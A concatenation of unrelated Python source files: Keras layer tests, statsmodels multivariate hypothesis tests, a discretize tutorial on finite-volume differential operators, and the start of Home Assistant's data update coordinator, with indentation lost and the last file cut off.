model.fit(x, y, batch_size=2, epochs=2, validation_data=(x, y))
self.assertLen(model.trainable_weights, 1)
self.assertAllClose(keras.backend.get_value(model.trainable_weights[0]), 2.)
@keras_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_creation_inside_lambda(self):
def lambda_fn(x):
scale = variables.Variable(1., trainable=True, name='scale')
shift = variables.Variable(1., trainable=True, name='shift')
return x * scale + shift
expected_error = textwrap.dedent(r'''
( )?The following Variables were created within a Lambda layer \(shift_and_scale\)
( )?but are not tracked by said layer:
( )? <tf.Variable \'.*shift_and_scale/scale:0\'.+
( )? <tf.Variable \'.*shift_and_scale/shift:0\'.+
( )?The layer cannot safely ensure proper Variable reuse.+''')
with self.assertRaisesRegex(ValueError, expected_error):
layer = keras.layers.Lambda(lambda_fn, name='shift_and_scale')
model = testing_utils.get_model_from_layers([layer], input_shape=(1,))
model(array_ops.ones((4, 1)))
@keras_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_transitive_variable_creation(self):
dense = keras.layers.Dense(1, use_bias=False, kernel_initializer='ones')
def bad_lambda_fn(x):
return dense(x + 1) # Dense layer is built on first call
expected_error = textwrap.dedent(r'''
( )?The following Variables were created within a Lambda layer \(bias_dense\)
( )?but are not tracked by said layer:
( )? <tf.Variable \'.*bias_dense/dense/kernel:0\'.+
( )?The layer cannot safely ensure proper Variable reuse.+''')
with self.assertRaisesRegex(ValueError, expected_error):
layer = keras.layers.Lambda(bad_lambda_fn, name='bias_dense')
model = testing_utils.get_model_from_layers([layer], input_shape=(1,))
model(array_ops.ones((4, 1)))
@keras_parameterized.run_all_keras_modes
@keras_parameterized.run_with_all_model_types
def test_warns_on_variable_capture(self):
v = variables.Variable(1., trainable=True)
def lambda_fn(x):
return x * v
expected_warning = textwrap.dedent(r'''
( )?The following Variables were used a Lambda layer\'s call \(lambda\), but
( )?are not present in its tracked objects:
( )? <tf.Variable \'.*Variable:0\'.+
( )?It is possible that this is intended behavior.+''')
layer = keras.layers.Lambda(lambda_fn)
def patched_warn(msg):
raise ValueError(msg)
layer._warn = patched_warn
with self.assertRaisesRegex(ValueError, expected_warning):
model = testing_utils.get_model_from_layers([layer], input_shape=(1,))
model(array_ops.ones((4, 1)))
@keras_parameterized.run_all_keras_modes
class CoreLayersTest(keras_parameterized.TestCase):
def test_masking(self):
testing_utils.layer_test(
keras.layers.Masking, kwargs={}, input_shape=(3, 2, 3))
def test_keras_mask(self):
x = np.ones((10, 10))
y = keras.layers.Masking(1.)(x)
self.assertTrue(hasattr(y, '_keras_mask'))
self.assertTrue(y._keras_mask is not None)
self.assertAllClose(self.evaluate(y._keras_mask), np.zeros((10,)))
def test_compute_mask_with_positional_mask_arg(self):
class MyLayer(keras.layers.Layer):
def call(self, inputs, mask=None):
return inputs
def compute_mask(self, inputs, mask=None):
if mask is not None:
return array_ops.ones(())
else:
return array_ops.zeros(())
x, mask = array_ops.ones((1, 1)), array_ops.ones((1, 1))
layer = MyLayer()
y = layer(x, mask)
# Check that `mask` was correctly sent to `compute_mask`.
self.assertEqual(keras.backend.get_value(y._keras_mask), 1)
def test_activation(self):
# with string argument
testing_utils.layer_test(
keras.layers.Activation,
kwargs={'activation': 'relu'},
input_shape=(3, 2))
# with function argument
testing_utils.layer_test(
keras.layers.Activation,
kwargs={'activation': keras.backend.relu},
input_shape=(3, 2))
def test_reshape(self):
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (8, 1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (-1, 1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (1, -1)},
input_shape=(3, 2, 4))
testing_utils.layer_test(
keras.layers.Reshape,
kwargs={'target_shape': (-1, 1)},
input_shape=(None, None, 2))
def test_reshape_set_static_shape(self):
input_layer = keras.Input(batch_shape=(1, None))
reshaped = keras.layers.Reshape((1, 100))(input_layer)
# Make sure the batch dim is not lost after array_ops.reshape.
self.assertEqual(reshaped.shape, [1, 1, 100])
def test_permute(self):
testing_utils.layer_test(
keras.layers.Permute, kwargs={'dims': (2, 1)}, input_shape=(3, 2, 4))
def test_permute_errors_on_invalid_starting_dims_index(self):
with self.assertRaisesRegex(ValueError, r'Invalid permutation .*dims.*'):
testing_utils.layer_test(
keras.layers.Permute,
kwargs={'dims': (0, 1, 2)}, input_shape=(3, 2, 4))
def test_permute_errors_on_invalid_set_of_dims_indices(self):
with self.assertRaisesRegex(ValueError, r'Invalid permutation .*dims.*'):
testing_utils.layer_test(
keras.layers.Permute,
kwargs={'dims': (1, 4, 2)}, input_shape=(3, 2, 4))
def test_flatten(self):
testing_utils.layer_test(
keras.layers.Flatten, kwargs={}, input_shape=(3, 2, 4))
# Test channels_first
inputs = np.random.random((10, 3, 5, 5)).astype('float32')
outputs = testing_utils.layer_test(
keras.layers.Flatten,
kwargs={'data_format': 'channels_first'},
input_data=inputs)
target_outputs = np.reshape(
np.transpose(inputs, (0, 2, 3, 1)), (-1, 5 * 5 * 3))
self.assertAllClose(outputs, target_outputs)
def test_flatten_scalar_channels(self):
testing_utils.layer_test(
keras.layers.Flatten, kwargs={}, input_shape=(3,))
# Test channels_first
inputs = np.random.random((10,)).astype('float32')
outputs = testing_utils.layer_test(
keras.layers.Flatten,
kwargs={'data_format': 'channels_first'},
input_data=inputs)
target_outputs = np.expand_dims(inputs, -1)
self.assertAllClose(outputs, target_outputs)
def test_repeat_vector(self):
testing_utils.layer_test(
keras.layers.RepeatVector, kwargs={'n': 3}, input_shape=(3, 2))
def test_dense(self):
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(None, None, 2))
testing_utils.layer_test(
keras.layers.Dense, kwargs={'units': 3}, input_shape=(3, 4, 5, 2))
def test_dense_output(self):
dense_inputs = ops.convert_to_tensor_v2_with_dispatch(
np.random.uniform(size=(10, 10)).astype('f'))
# Create some sparse data where multiple rows and columns are missing.
sparse_inputs = sparse_tensor.SparseTensor(
indices=np.random.randint(low=0, high=10, size=(5, 2)),
values=np.random.uniform(size=(5,)).astype('f'),
dense_shape=[10, 10])
sparse_inputs = sparse_ops.sparse_reorder(sparse_inputs)
layer = keras.layers.Dense(
5,
kernel_initializer=keras.initializers.RandomUniform(),
bias_initializer=keras.initializers.RandomUniform(),
dtype='float32')
dense_outputs = layer(dense_inputs)
sparse_outpus = layer(sparse_inputs)
expected_dense = math_ops.add(
math_ops.matmul(dense_inputs, keras.backend.get_value(layer.kernel)),
keras.backend.get_value(layer.bias))
expected_sparse = math_ops.add(
math_ops.matmul(
sparse_ops.sparse_tensor_to_dense(sparse_inputs),
keras.backend.get_value(layer.kernel)),
keras.backend.get_value(layer.bias))
self.assertAllClose(dense_outputs, expected_dense)
self.assertAllClose(sparse_outpus, expected_sparse)
def test_dense_dtype(self):
inputs = ops.convert_to_tensor_v2_with_dispatch(
np.random.randint(low=0, high=7, size=(2, 2)))
layer = keras.layers.Dense(5, dtype='float32')
outputs = layer(inputs)
self.assertEqual(outputs.dtype, 'float32')
def test_dense_with_policy(self):
inputs = ops.convert_to_tensor_v2_with_dispatch(
np.random.randint(low=0, high=7, size=(2, 2)))
layer = keras.layers.Dense(5, dtype=policy.Policy('mixed_float16'))
outputs = layer(inputs)
output_signature = layer.compute_output_signature(
tensor_spec.TensorSpec(dtype='float16', shape=(2, 2)))
self.assertEqual(output_signature.dtype, dtypes.float16)
self.assertEqual(output_signature.shape, (2, 5))
self.assertEqual(outputs.dtype, 'float16')
self.assertEqual(layer.kernel.dtype, 'float32')
def test_dense_regularization(self):
layer = keras.layers.Dense(
3,
kernel_regularizer=keras.regularizers.l1(0.01),
bias_regularizer='l1',
activity_regularizer='l2',
name='dense_reg')
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(3, len(layer.losses))
def test_dense_constraints(self):
k_constraint = keras.constraints.max_norm(0.01)
b_constraint = keras.constraints.max_norm(0.01)
layer = keras.layers.Dense(
3, kernel_constraint=k_constraint, bias_constraint=b_constraint)
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(layer.kernel.constraint, k_constraint)
self.assertEqual(layer.bias.constraint, b_constraint)
def test_activity_regularization(self):
layer = keras.layers.ActivityRegularization(l1=0.1)
layer(keras.backend.variable(np.ones((2, 4))))
self.assertEqual(1, len(layer.losses))
config = layer.get_config()
self.assertEqual(config.pop('l1'), 0.1)
def test_numpy_inputs(self):
if context.executing_eagerly():
layer = keras.layers.RepeatVector(2)
x = np.ones((10, 10))
self.assertAllEqual(np.ones((10, 2, 10)), layer(x))
layer = keras.layers.Concatenate()
x, y = np.ones((10, 10)), np.ones((10, 10))
self.assertAllEqual(np.ones((10, 20)), layer([x, y]))
@keras_parameterized.run_all_keras_modes
class TFOpLambdaTest(keras_parameterized.TestCase):
def test_non_tf_symbol(self):
def dummy_func(a, b):
return a + b
layer = core.TFOpLambda(dummy_func)
self.assertIsNone(layer.symbol)
self.assertEqual(layer.name, 'dummy_func')
with self.assertRaisesRegex(ValueError, 'was generated from .*dummy_func'):
layer.get_config()
if __name__ == '__main__':
test.main()
|
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 5 14:48:19 2017
Author: Josef Perktold
"""
import numpy as np
from numpy.testing import assert_allclose, assert_equal #noqa
from statsmodels.stats import weightstats
import statsmodels.stats.multivariate as smmv # pytest cannot import test_xxx
from statsmodels.stats.multivariate import confint_mvmean_fromstats
from statsmodels.tools.testing import Holder
def test_mv_mean():
# names = ['id', 'mpg1', 'mpg2', 'add']
x = np.asarray([[1.0, 24.0, 23.5, 1.0],
[2.0, 25.0, 24.5, 1.0],
[3.0, 21.0, 20.5, 1.0],
[4.0, 22.0, 20.5, 1.0],
[5.0, 23.0, 22.5, 1.0],
[6.0, 18.0, 16.5, 1.0],
[7.0, 17.0, 16.5, 1.0],
[8.0, 28.0, 27.5, 1.0],
[9.0, 24.0, 23.5, 1.0],
[10.0, 27.0, 25.5, 1.0],
[11.0, 21.0, 20.5, 1.0],
[12.0, 23.0, 22.5, 1.0],
[1.0, 20.0, 19.0, 0.0],
[2.0, 23.0, 22.0, 0.0],
[3.0, 21.0, 20.0, 0.0],
[4.0, 25.0, 24.0, 0.0],
[5.0, 18.0, 17.0, 0.0],
[6.0, 17.0, 16.0, 0.0],
[7.0, 18.0, 17.0, 0.0],
[8.0, 24.0, 23.0, 0.0],
[9.0, 20.0, 19.0, 0.0],
[10.0, 24.0, 22.0, 0.0],
[11.0, 23.0, 22.0, 0.0],
[12.0, 19.0, 18.0, 0.0]])
res = smmv.test_mvmean(x[:, 1:3], [21, 21])
res_stata = Holder(p_F=1.25062334808e-09,
df_r=22,
df_m=2,
F=59.91609589041116,
T2=125.2791095890415)
assert_allclose(res.statistic, res_stata.F, rtol=1e-10)
assert_allclose(res.pvalue, res_stata.p_F, rtol=1e-10)
assert_allclose(res.t2, res_stata.T2, rtol=1e-10)
assert_equal(res.df, [res_stata.df_m, res_stata.df_r])
# diff of paired sample
mask = x[:, -1] == 1
x1 = x[mask, 1:3]
x0 = x[~mask, 1:3]
res_p = smmv.test_mvmean(x1 - x0, [0, 0])
# result Stata hotelling
res_stata = Holder(T2=9.698067632850247,
df=10,
k=2,
N=12,
F=4.4082126, # not in return List
p_F=0.0424) # not in return List
res = res_p
assert_allclose(res.statistic, res_stata.F, atol=5e-7)
assert_allclose(res.pvalue, res_stata.p_F, atol=5e-4)
assert_allclose(res.t2, res_stata.T2, rtol=1e-10)
assert_equal(res.df, [res_stata.k, res_stata.df])
# mvtest means diff1 diff2, zero
res_stata = Holder(p_F=.0423949782937231,
df_r=10,
df_m=2,
F=4.408212560386478,
T2=9.69806763285025)
assert_allclose(res.statistic, res_stata.F, rtol=1e-12)
assert_allclose(res.pvalue, res_stata.p_F, rtol=1e-12)
assert_allclose(res.t2, res_stata.T2, rtol=1e-12)
assert_equal(res.df, [res_stata.df_m, res_stata.df_r])
dw = weightstats.DescrStatsW(x)
ci0 = dw.tconfint_mean(alpha=0.05)
nobs = len(x[:, 1:])
ci1 = confint_mvmean_fromstats(dw.mean, np.diag(dw.var), nobs,
lin_transf=np.eye(4), alpha=0.05)
ci2 = confint_mvmean_fromstats(dw.mean, dw.cov, nobs,
lin_transf=np.eye(4), alpha=0.05)
assert_allclose(ci1[:2], ci0, rtol=1e-13)
assert_allclose(ci2[:2], ci0, rtol=1e-13)
# test from data
res = smmv.confint_mvmean(x, lin_transf=np.eye(4), alpha=0.05)
assert_allclose(res, ci2, rtol=1e-13)
def test_mvmean_2indep():
x = np.asarray([[1.0, 24.0, 23.5, 1.0],
[2.0, 25.0, 24.5, 1.0],
[3.0, 21.0, 20.5, 1.0],
[4.0, 22.0, 20.5, 1.0],
[5.0, 23.0, 22.5, 1.0],
[6.0, 18.0, 16.5, 1.0],
[7.0, 17.0, 16.5, 1.0],
[8.0, 28.0, 27.5, 1.0],
[9.0, 24.0, 23.5, 1.0],
[10.0, 27.0, 25.5, 1.0],
[11.0, 21.0, 20.5, 1.0],
[12.0, 23.0, 22.5, 1.0],
[1.0, 20.0, 19.0, 0.0],
[2.0, 23.0, 22.0, 0.0],
[3.0, 21.0, 20.0, 0.0],
[4.0, 25.0, 24.0, 0.0],
[5.0, 18.0, 17.0, 0.0],
[6.0, 17.0, 16.0, 0.0],
[7.0, 18.0, 17.0, 0.0],
[8.0, 24.0, 23.0, 0.0],
[9.0, 20.0, 19.0, 0.0],
[10.0, 24.0, 22.0, 0.0],
[11.0, 23.0, 22.0, 0.0],
[12.0, 19.0, 18.0, 0.0]])
y = np.asarray([[1.1, 24.1, 23.4, 1.1],
[1.9, 25.2, 24.3, 1.2],
[3.2, 20.9, 20.2, 1.3],
[4.1, 21.8, 20.6, 0.9],
[5.2, 23.0, 22.7, 0.8],
[6.3, 18.1, 16.8, 0.7],
[7.1, 17.2, 16.5, 1.0],
[7.8, 28.3, 27.4, 1.1],
[9.5, 23.9, 23.3, 1.2],
[10.1, 26.8, 25.2, 1.3],
[10.5, 26.7, 20.6, 0.9],
[12.1, 23.0, 22.7, 0.8],
[1.1, 20.1, 19.0, 0.7],
[1.8, 23.2, 22.0, 0.1],
[3.2, 21.3, 20.3, 0.2],
[4.3, 24.9, 24.2, 0.3],
[5.5, 17.9, 17.1, 0.0],
[5.5, 17.8, 16.0, 0.6],
[7.1, 17.7, 16.7, 0.0],
[7.7, 24.0, 22.8, 0.5],
[9.1, 20.1, 18.9, 0.0],
[10.2, 24.2, 22.3, 0.3],
[11.3, 23.3, 22.2, 0.0],
[11.7, 18.8, 18.1, 0.1]])
res = smmv.test_mvmean_2indep(x, y)
res_stata = Holder(p_F=0.6686659171701677,
df_r=43,
df_m=4,
F=0.594263378678938,
T2=2.5428944576028973)
assert_allclose(res.statistic, res_stata.F, rtol=1e-10)
assert_allclose(res.pvalue, res_stata.p_F, rtol=1e-10)
assert_allclose(res.t2, res_stata.T2, rtol=1e-10)
assert_equal(res.df, [res_stata.df_m, res_stata.df_r])
def test_confint_simult():
# example from book for simultaneous confint
m = [526.29, 54.69, 25.13]
cov = [[5808.06, 597.84, 222.03],
[597.84, 126.05, 23.39],
[222.03, 23.39, 23.11]]
nobs = 87
res_ci = confint_mvmean_fromstats(m, cov, nobs, lin_transf=np.eye(3),
simult=True)
cii = [confint_mvmean_fromstats(
m, cov, nobs, lin_transf=np.eye(3)[i], simult=True)[:2]
for i in range(3)]
cii = np.array(cii).squeeze()
# these might use rounded numbers in intermediate computation
res_ci_book = np.array([[503.06, 550.12], [51.22, 58.16], [23.65, 26.61]])
assert_allclose(res_ci[0], res_ci_book[:, 0], rtol=1e-3) # low
assert_allclose(res_ci[0], res_ci_book[:, 0], rtol=1e-3) # upp
assert_allclose(res_ci[0], cii[:, 0], rtol=1e-13)
assert_allclose(res_ci[1], cii[:, 1], rtol=1e-13)
res_constr = confint_mvmean_fromstats(m, cov, nobs, lin_transf=[0, 1, -1],
simult=True)
assert_allclose(res_constr[0], 29.56 - 3.12, rtol=1e-3)
assert_allclose(res_constr[1], 29.56 + 3.12, rtol=1e-3)
# TODO: this assumes separate constraints,
# but we want multiplicity correction
# test if several constraints or transformations work
# original, flipping sign, multiply by 2
lt = [[0, 1, -1], [0, -1, 1], [0, 2, -2]]
res_constr2 = confint_mvmean_fromstats(m, cov, nobs, lin_transf=lt,
simult=True)
lows = res_constr[0], - res_constr[1], 2 * res_constr[0]
upps = res_constr[1], - res_constr[0], 2 * res_constr[1]
# TODO: check return dimensions
lows = np.asarray(lows).squeeze()
upps = np.asarray(upps).squeeze()
assert_allclose(res_constr2[0], lows, rtol=1e-13)
assert_allclose(res_constr2[1], upps, rtol=1e-13)
class TestCovStructure(object):
@classmethod
def setup_class(cls):
# computed from data with ``cov = np.cov(dta1, rowvar=0, ddof=1)``
cls.cov = np.array(
[[28.965925000000002, 17.215358333333327, 2.6945666666666654],
[17.215358333333327, 21.452852666666672, 6.044527833333332],
[2.6945666666666654, 6.044527833333332, 13.599042333333331]])
cls.nobs = 25
def test_spherical(self):
cov, nobs = self.cov, self.nobs
# from Stata 14
p_chi2 = 0.0006422366870356
# df = 5
chi2 = 21.53275509455011
stat, pv = smmv.test_cov_spherical(cov, nobs)
assert_allclose(stat, chi2, rtol=1e-7)
assert_allclose(pv, p_chi2, rtol=1e-6)
def test_diagonal(self):
cov, nobs = self.cov, self.nobs
# from Stata 14
p_chi2 = 0.0004589987613319
# df = 3
chi2 = 17.91025335733012
stat, pv = smmv.test_cov_diagonal(cov, nobs)
assert_allclose(stat, chi2, rtol=1e-8)
assert_allclose(pv, p_chi2, rtol=1e-7)
def test_blockdiagonal(self):
cov, nobs = self.cov, self.nobs
# from Stata 14
p_chi2 = 0.1721758850671037
# df = 2
chi2 = 3.518477474111563
# cov_blocks = cov[:2, :2], cov[-1:, -1:]
# stat, pv = smmv.test_cov_blockdiagonal(cov, nobs, cov_blocks)
block_len = [2, 1]
stat, pv = smmv.test_cov_blockdiagonal(cov, nobs, block_len)
assert_allclose(stat, chi2, rtol=1e-7)
assert_allclose(pv, p_chi2, rtol=1e-6)
def test_covmat(self):
cov, nobs = self.cov, self.nobs
# from Stata 14
p_chi2 = 0.4837049015162541
# df = 6
chi2 = 5.481422374989864
cov_null = np.array([[30, 15, 0], [15, 20, 0], [0, 0, 10]])
stat, pv = smmv.test_cov(cov, nobs, cov_null)
assert_allclose(stat, chi2, rtol=1e-7)
assert_allclose(pv, p_chi2, rtol=1e-6)
def test_cov_oneway():
# from Stata 14
p_chi2 = .1944866419800838
chi2 = 13.55075120374669
df = 10
p_F_Box = .1949865290585139
df_r_Box = 18377.68924302788
df_m_Box = 10
F_Box = 1.354282822767436
nobs = [32, 32]
cov_m = np.array(
[[5.192540322580645, 4.545362903225806, 6.522177419354839, 5.25],
[4.545362903225806, 13.184475806451612, 6.76008064516129,
6.266129032258064],
[6.522177419354839, 6.76008064516129, 28.673387096774192,
14.46774193548387],
[5.25, 6.266129032258064, 14.46774193548387, 16.64516129032258]])
cov_f = np.array(
[[9.13608870967742, 7.549395161290322, 4.86391129032258,
4.151209677419355],
[7.549395161290322, 18.60383064516129, 10.224798387096774,
5.445564516129032],
[4.86391129032258, 10.224798387096774, 30.039314516129032,
13.493951612903226],
[4.151209677419355, 5.445564516129032, 13.493951612903226,
27.995967741935484]])
res = smmv.test_cov_oneway([cov_m, cov_f], nobs)
stat, pv = res
assert_allclose(stat, F_Box, rtol=1e-10)
assert_allclose(pv, p_F_Box, rtol=1e-6)
assert_allclose(res.statistic_f, F_Box, rtol=1e-10)
assert_allclose(res.pvalue_f, p_F_Box, rtol=1e-6)
assert_allclose(res.df_f, (df_m_Box, df_r_Box), rtol=1e-13)
assert_allclose(res.statistic_chi2, chi2, rtol=1e-10)
assert_allclose(res.pvalue_chi2, p_chi2, rtol=1e-6)
assert_equal(res.df_chi2, df)
|
|
# -*- coding: utf-8 -*-
"""
Differential Operators
======================
When solving PDEs using the finite volume approach, inner products may
contain differential operators. Where :math:`\\psi` and :math:`\\phi` are
scalar quantities, and :math:`\\vec{u}` and :math:`\\vec{v}` are vector
quantities, we may need to derive a discrete approximation for the following
inner products:
1. :math:`(\\vec{u} , \\nabla \\phi)`
2. :math:`(\\psi , \\nabla \\cdot \\vec{v})`
3. :math:`(\\vec{u} , \\nabla \\times \\vec{v})`
4. :math:`(\\psi, \\Delta^2 \\phi)`
In this section, we demonstrate how to go from the inner product to the
discrete approximation for each case. In doing so, we must construct
discrete differential operators, inner product matricies and consider
boundary conditions.
"""
####################################################
#
# Import Packages
# ---------------
#
# Here we import the packages required for this tutorial
#
from discretize.utils import sdiag
from discretize import TensorMesh
import numpy as np
import matplotlib.pyplot as plt
#####################################################
# Gradient
# --------
#
# Where :math:`\phi` is a scalar quantity and :math:`\vec{u}` is a vector
# quantity, we would like to evaluate the following inner product:
#
# .. math::
# (\vec{u} , \nabla \phi) = \int_\Omega \vec{u} \cdot \nabla \phi \, dv
#
# **Inner Product at edges:**
#
# In the case that :math:`\vec{u}` represents a field, it is natural for it to
# be discretized to live on cell edges. By defining :math:`\phi` to live at
# the nodes, we can use the nodal gradient operator (:math:`\mathbf{G_n}`) to
# map from nodes to edges. The inner product is therefore computed using an
# inner product matrix (:math:`\mathbf{M_e}`) for
# quantities living on cell edges, e.g.:
#
# .. math::
# (\vec{u} , \nabla \phi) \approx \mathbf{u^T M_e G_n \phi}
#
# **Inner Product at faces:**
#
# In the case that :math:`\vec{u}` represents a flux, it is natural for it to
# be discretized to live on cell faces. By defining :math:`\phi` to live at
# cell centers, we can use the cell gradient operator (:math:`\mathbf{G_c}`) to
# map from centers to faces. In this case, we must impose boundary conditions
# on the discrete gradient operator because it cannot use locations outside
# the mesh to evaluate the gradient on the boundary. If done correctly, the
# inner product is computed using an inner product matrix (:math:`\mathbf{M_f}`)
# for quantities living on cell faces, e.g.:
#
# .. math::
# (\vec{u} , \nabla \phi) \approx \mathbf{u^T M_f G_c \phi}
#
# Make basic mesh
h = np.ones(10)
mesh = TensorMesh([h, h, h])
# Items required to perform u.T*(Me*Gn*phi)
Me = mesh.getEdgeInnerProduct() # Basic inner product matrix (edges)
Gn = mesh.nodalGrad # Nodes to edges gradient
# Items required to perform u.T*(Mf*Gc*phi)
Mf = mesh.getFaceInnerProduct() # Basic inner product matrix (faces)
mesh.setCellGradBC(["neumann", "dirichlet", "neumann"]) # Set boundary conditions
Gc = mesh.cellGrad # Cells to faces gradient
# Plot Sparse Representation
fig = plt.figure(figsize=(5, 6))
ax1 = fig.add_subplot(121)
ax1.spy(Me * Gn, markersize=0.5)
ax1.set_title("Me*Gn")
ax2 = fig.add_subplot(122)
ax2.spy(Mf * Gc, markersize=0.5)
ax2.set_title("Mf*Gc")
#####################################################
# Divergence
# ----------
#
# Where :math:`\psi` is a scalar quantity and :math:`\vec{v}` is a vector
# quantity, we would like to evaluate the following inner product:
#
# .. math::
# (\psi , \nabla \cdot \vec{v}) = \int_\Omega \psi \nabla \cdot \vec{v} \, dv
#
# The divergence defines a measure of the flux leaving/entering a volume. As a
# result, it is natural for :math:`\vec{v}` to be a flux defined on cell faces.
# The face divergence operator (:math:`\mathbf{D}`) maps from cell faces to
# cell centers, therefore # we should define :math:`\psi` at cell centers. The
# inner product is ultimately computed using an inner product matrix
# (:math:`\mathbf{M_f}`) for quantities living on cell faces, e.g.:
#
# .. math::
# (\psi , \nabla \cdot \vec{v}) \approx \mathbf{\psi^T} \textrm{diag} (\mathbf{vol} ) \mathbf{D v}
#
# Make basic mesh
h = np.ones(10)
mesh = TensorMesh([h, h, h])
# Items required to perform psi.T*(Mc*D*v)
Mc = sdiag(mesh.vol) # Basic inner product matrix (centers)
D = mesh.faceDiv # Faces to centers divergence
# Plot sparse representation
fig = plt.figure(figsize=(8, 5))
ax1 = fig.add_subplot(111)
ax1.spy(Mc * D, markersize=0.5)
ax1.set_title("Mc*D", pad=20)
#####################################################
# Curl
# ----
#
# Where :math:`\vec{u}` and :math:`\vec{v}` are vector quantities, we would
# like to evaluate the following inner product:
#
# .. math::
# (\vec{u} , \nabla \times \vec{v}) = \int_\Omega \vec{u} \nabla \times \vec{v} \, dv
#
# **Inner Product at Faces:**
#
# Let :math:`\vec{u}` denote a flux and let :math:`\vec{v}` denote a field.
# In this case, it is natural for the flux :math:`\vec{u}` to live on cell
# faces and for the field :math:`\vec{v}` to live on cell edges. The discrete
# curl operator (:math:`\mathbf{C_e}`) in this case naturally maps from cell
# edges to cell faces without the need to define boundary conditions. The
# inner product can be approxiated using an inner product matrix
# (:math:`\mathbf{M_f}`) for quantities living on cell faces, e.g.:
#
# .. math::
# (\vec{u} , \nabla \times \vec{v}) \approx \mathbf{u^T M_f C_e v}
#
# **Inner Product at Edges:**
#
# Now let :math:`\vec{u}` denote a field and let :math:`\vec{v}` denote a flux.
# Now it is natural for the :math:`\vec{u}` to live on cell edges
# and for :math:`\vec{v}` to live on cell faces. We would like to compute the
# inner product using an inner product matrix (:math:`\mathbf{M_e}`) for
# quantities living on cell edges. However, this requires a discrete curl
# operator (:math:`\mathbf{C_f}`) that maps from cell faces
# to cell edges; which requires to impose boundary conditions on the operator.
# If done successfully:
#
# .. math::
# (\vec{u} , \nabla \times \vec{v}) \approx \mathbf{u^T M_e C_f v}
#
# Make basic mesh
h = np.ones(10)
mesh = TensorMesh([h, h, h])
# Items required to perform u.T*(Mf*Ce*v)
Mf = mesh.getFaceInnerProduct() # Basic inner product matrix (faces)
Ce = mesh.edgeCurl # Edges to faces curl
# Items required to perform u.T*(Me*Cf*v)
Me = mesh.getEdgeInnerProduct() # Basic inner product matrix (edges)
Cf = mesh.edgeCurl.T # Faces to edges curl (assumes Dirichlet)
# Plot Sparse Representation
fig = plt.figure(figsize=(9, 5))
ax1 = fig.add_subplot(121)
ax1.spy(Mf * Ce, markersize=0.5)
ax1.set_title("Mf*Ce", pad=10)
ax2 = fig.add_subplot(122)
ax2.spy(Me * Cf, markersize=0.5)
ax2.set_title("Me*Cf", pad=10)
###########################################################
# Scalar Laplacian
# ----------------
#
# Where :math:`\psi` and :math:`\phi` are scalar quantities, and the scalar
# Laplacian :math:`\Delta^2 = \nabla \cdot \nabla`, we would like to
# approximate the following inner product:
#
# .. math::
# (\psi , \nabla \cdot \nabla \phi) = \int_\Omega \psi (\nabla \cdot \nabla \phi) \, dv
#
# Using :math:`p \nabla \cdot \mathbf{q} = \nabla \cdot (p \mathbf{q}) - \mathbf{q} \cdot (\nabla p )`
# and the Divergence theorem we obtain:
#
# .. math::
# \int_{\partial \Omega} \mathbf{n} \cdot ( \psi \nabla \phi ) \, da
# - \int_\Omega (\nabla \psi ) \cdot (\nabla \phi ) \, dv
#
# In this case, the surface integral can be eliminated if we can assume a
# Neumann condition of :math:`\partial \phi/\partial n = 0` on the boundary.
#
# **Inner Prodcut at Edges:**
#
# Let :math:`\psi` and :math:`\phi` be discretized to the nodes. In this case,
# the discrete gradient operator (:math:`\mathbf{G_n}`) must map from nodes
# to edges. Ultimately we evaluate the inner product using an inner product
# matrix (:math:`\mathbf{M_e}` for quantities living on cell edges, e.g.:
#
# .. math::
# (\psi , \nabla \cdot \nabla \phi) \approx \mathbf{\psi G_n^T M_e G_n \phi}
#
# **Inner Product at Faces:**
#
# Let :math:`\psi` and :math:`\phi` be discretized to cell centers. In this
# case, the discrete gradient operator (:math:`\mathbf{G_c}`) must map from
# centers to faces; and requires the user to set Neumann conditions in the
# operator. Ultimately we evaluate the inner product using an inner product
# matrix (:math:`\mathbf{M_f}`) for quantities living on cell faces, e.g.:
#
# .. math::
# (\psi , \nabla \cdot \nabla \phi) \approx \mathbf{\psi G_c^T M_f G_c \phi}
#
#
# Make basic mesh
h = np.ones(10)
mesh = TensorMesh([h, h, h])
# Items required to perform psi.T*(Gn.T*Me*Gn*phi)
Me = mesh.getEdgeInnerProduct() # Basic inner product matrix (edges)
Gn = mesh.nodalGrad # Nodes to edges gradient
# Items required to perform psi.T*(Gc.T*Mf*Gc*phi)
Mf = mesh.getFaceInnerProduct() # Basic inner product matrix (faces)
mesh.setCellGradBC(["dirichlet", "dirichlet", "dirichlet"])
Gc = mesh.cellGrad # Centers to faces gradient
# Plot Sparse Representation
fig = plt.figure(figsize=(9, 4))
ax1 = fig.add_subplot(121)
ax1.spy(Gn.T * Me * Gn, markersize=0.5)
ax1.set_title("Gn.T*Me*Gn", pad=5)
ax2 = fig.add_subplot(122)
ax2.spy(Gc.T * Mf * Gc, markersize=0.5)
ax2.set_title("Gc.T*Mf*Gc", pad=5)
|
|
"""Helpers to help coordinate updates."""
from __future__ import annotations
import asyncio
from datetime import datetime, timedelta
import logging
from time import monotonic
from typing import Any, Awaitable, Callable, Generic, TypeVar
import urllib.error
import aiohttp
import requests
from homeassistant.const import EVENT_HOMEASSISTANT_STOP
from homeassistant.core import CALLBACK_TYPE, Event, HassJob, HomeAssistant, callback
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers import entity, event
from homeassistant.util.dt import utcnow
from .debounce import Debouncer
REQUEST_REFRESH_DEFAULT_COOLDOWN = 10
REQUEST_REFRESH_DEFAULT_IMMEDIATE = True
T = TypeVar("T")
# mypy: disallow-any-generics
class UpdateFailed(Exception):
"""Raised when an update has failed."""
class DataUpdateCoordinator(Generic[T]):
"""Class to manage fetching data from single endpoint."""
def __init__(
self,
hass: HomeAssistant,
logger: logging.Logger,
*,
name: str,
update_interval: timedelta | None = None,
update_method: Callable[[], Awaitable[T]] | None = None,
